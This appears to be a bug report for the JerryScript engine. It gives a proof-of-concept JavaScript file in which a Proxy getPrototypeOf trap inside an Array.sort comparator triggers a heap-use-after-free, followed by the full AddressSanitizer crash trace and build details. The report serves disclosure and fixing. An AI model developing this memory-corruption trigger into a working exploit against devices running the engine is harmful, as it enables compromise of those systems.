var a= ["", "\0", "\t", "\n", "\v", "\f", "\r", " ", "\u00a0", "\u2028", "\u2029", "\ufeff"]
Array.prototype[4] = 10;
function Test()
{
a.sort(function() {
var A = function() { };
A.prototype.x = 42;
var o = new Proxy({
"3": {
writable:false,
value:20
}
}, {
getPrototypeOf: function (val, size, ch) {
var result = new String(val);
if (ch == null) {
ch = " ";
}
while (result.length < size) {
result = ch + result;
}
return result;
}
});
o.x = 43;
var result = "";
for (var p in o)
result += o[p];
return a | 0;
});
WScript.Echo(a);
}
Test();
Execution steps
./build/bin/jerry ./build/bin/poc.js
Output
=================================================================
==179417==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5304720 at pc 0x566b5311 bp 0xff9aa468 sp 0xff9aa458
READ of size 2 at 0xf5304720 thread T0
#0 0x566b5310 in ecma_is_lexical_environment /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:177
#1 0x566b5447 in ecma_get_object_type /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:203
#2 0x56670759 in ecma_op_object_get_own_property_descriptor /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1862
#3 0x56672f01 in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2513
#4 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368
#5 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986
#6 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953
#7 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#8 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#9 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412
#10 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063
#11 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47
#12 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109
#13 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184
#14 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918
#15 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490
#16 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522
#17 0x566a7805 in ecma_op_function_call_native /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1246
#18 0x566a8125 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1416
#19 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822
#20 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959
#21 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#22 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#23 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412
#24 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822
#25 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959
#26 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#27 0x5661c015 in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350
#28 0x566e3344 in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608
#29 0x566dc51a in main /root/jerryscript/jerry-main/main-unix.c:123
#30 0xf6f11f20 in __libc_start_main (/lib32/libc.so.6+0x18f20)
#31 0x565877e0 (/root/jerryscript/build3/bin/jerry+0x1d7e0)
0xf5304720 is located 0 bytes inside of 24-byte region [0xf5304720,0xf5304738)
freed by thread T0 here:
#0 0xf72a0b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94)
#1 0x566384f0 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478
#2 0x5663889b in jmem_heap_free_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:692
#3 0x565f8ed9 in ecma_dealloc_extended_object /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:123
#4 0x566f6c53 in ecma_gc_free_object /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1763
#5 0x566f78c6 in ecma_gc_run /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1891
#6 0x566f7aa6 in ecma_free_unused_memory /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:1935
#7 0x56638278 in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:285
#8 0x56638318 in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325
#9 0x56671b58 in ecma_object_sort_property_names /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2262
#10 0x56672c78 in ecma_op_object_own_property_keys /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2463
#11 0x56672dba in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2489
#12 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368
#13 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986
#14 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953
#15 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#16 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#17 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412
#18 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063
#19 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47
#20 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109
#21 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184
#22 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918
#23 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490
#24 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522
#25 0x566a7805 in ecma_op_function_call_native /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1246
#26 0x566a8125 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1416
#27 0x5661dd7d in opfunc_call.lto_priv.464 /root/jerryscript/jerry-core/vm/vm.c:822
#28 0x565f8827 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4959
#29 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
previously allocated by thread T0 here:
#0 0xf72a0f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54)
#1 0x566381a8 in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254
#2 0x56638286 in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291
#3 0x56638318 in jmem_heap_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:325
#4 0x565f8eb6 in ecma_alloc_extended_object /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:109
#5 0x566b4dfa in ecma_create_object /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:82
#6 0x5668ae26 in ecma_op_create_string_object /root/jerryscript/jerry-core/ecma/operations/ecma-string-object.c:83
#7 0x565f76f7 in ecma_builtin_string_dispatch_construct /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string.c:387
#8 0x566cf78a in ecma_builtin_dispatch_construct /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1555
#9 0x566a8631 in ecma_op_function_construct /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1562
#10 0x5661e2f4 in opfunc_construct.lto_priv.461 /root/jerryscript/jerry-core/vm/vm.c:907
#11 0x565f8865 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4980
#12 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#13 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#14 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412
#15 0x56678cd3 in ecma_proxy_object_get_prototype_of /root/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:318
#16 0x56673108 in ecma_op_object_enumerate /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2552
#17 0x56612f78 in opfunc_for_in /root/jerryscript/jerry-core/vm/opcodes.c:368
#18 0x56630ffe in vm_loop.lto_priv.465 /root/jerryscript/jerry-core/vm/vm.c:3986
#19 0x565f87c3 in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953
#20 0x565f8e0c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060
#21 0x566a74be in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1182
#22 0x566a8106 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1412
#23 0x565fc0b9 in ecma_builtin_array_prototype_object_sort_compare_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1063
#24 0x565ddfba in ecma_builtin_helper_array_merge_sort_bottom_up /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:47
#25 0x565de1f0 in ecma_builtin_helper_array_merge_sort_helper /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers-sort.c:109
#26 0x565fc84f in ecma_builtin_array_prototype_object_sort /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1184
#27 0x566030f9 in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2918
#28 0x566cf1d0 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1490
#29 0x566cf466 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1522
SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:177 in ecma_is_lexical_environment
Shadow bytes around the buggy address:
0x3ea60890: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x3ea608a0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x3ea608b0: fd fa fa fa fd fd fd fa fa fa fa fa fa fa fa fa
0x3ea608c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3ea608d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3ea608e0: fa fa fa fa[fd]fd fd fa fa fa fd fd fd fa fa fa
0x3ea608f0: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa
0x3ea60900: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x3ea60910: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
0x3ea60920: 00 00 00 fa fa fa 00 00 00 fa fa fa fd fd fd fd
0x3ea60930: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==179417==ABORTING
Credits: Found by chong from OWL337.
The text was updated successfully, but these errors were encountered:
JerryScript revision
fdaacde
Build platform
Ubuntu 16.04.6 LTS (Linux 4.4.0-179-generic x86_64)
Build steps
Test case
Execution steps
Output
Credits: Found by chong from OWL337.
The text was updated successfully, but these errors were encountered: